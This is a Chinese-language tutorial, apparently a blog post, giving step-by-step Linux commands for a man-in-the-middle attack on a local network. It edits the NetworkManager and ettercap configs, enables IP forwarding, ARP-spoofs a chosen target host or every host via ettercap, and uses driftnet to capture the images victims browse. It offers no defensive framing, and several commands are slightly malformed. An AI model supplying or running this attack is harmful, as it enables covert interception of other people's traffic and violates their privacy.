环境:linux
这里先不写怎么进入这个局域网。假设已经在这个局域网内了。
基本原理:嗅探,arp欺骗,会话劫持等原理,可以自行搜索原理进行了解,这里只是做出实例进行参考。
过程探讨:假如是第一次作为第三者的朋友,进行配置文件的修改。
首先进行NetWorkManger中配置文件的修改。
vi /etc/NetworkManager/NetworkManager.conf
修改其中的 managed选项,第一次打开的朋友需要将managed选项有false变为true,再然后启动NetWorkManager服务。
service network-manager restart
再然后修改ettercap的配置文件
vi /etc/ettercap/etter.conf
修改其中的[privs]下的ec_uid和ec_gid选项,初次打开时会是ec_uid与ec_gid都同时等于65535情况,两者统一修改为等于0如下图所示:
再然后将此配置文件中的linux选项中的#if you use iptables解释进行解放,将注释符去掉,修改后结果图如下:
配置完毕后, 下一步输入以下代码:
cat /proc/sys/net/ipv4/ip_forward
当然看你喜好,你也可以输入
vi/vim /proc/sys/net/ipv4/ip_forward
进入文件查看,当数值为0时修改成为1。
代码执行如下:
echo 1 >> /proc/sys/net/ipv4/ip_forward
下面就是核心了代码了:
ettercap i wlan0 -Tq -M arp:/目标主机IP地址/ /网关地址/
"/"这个符号是不能省略掉的。当想要嗅探这个局域网内所有的机器时就将目标IP变为空;同理要想嗅探所有网络的IP的话就将网关地址为空。当然在两者全部为空的时候会出现错误提示,这时可以把“/”变为三个。
这时服务已经启动起来了。
我们再打开一个终端,并且打开driftnet服务 参数如下:driftnet -i net。当然 -i参数只是比较普通的一个参数,想要详细了解的朋友可以搜索一下资料。这时如果对方在浏览图片信息,driftnet就可以传输出图像数据了。
这时内网渗透基本完成。谢谢大家阅读我的文章。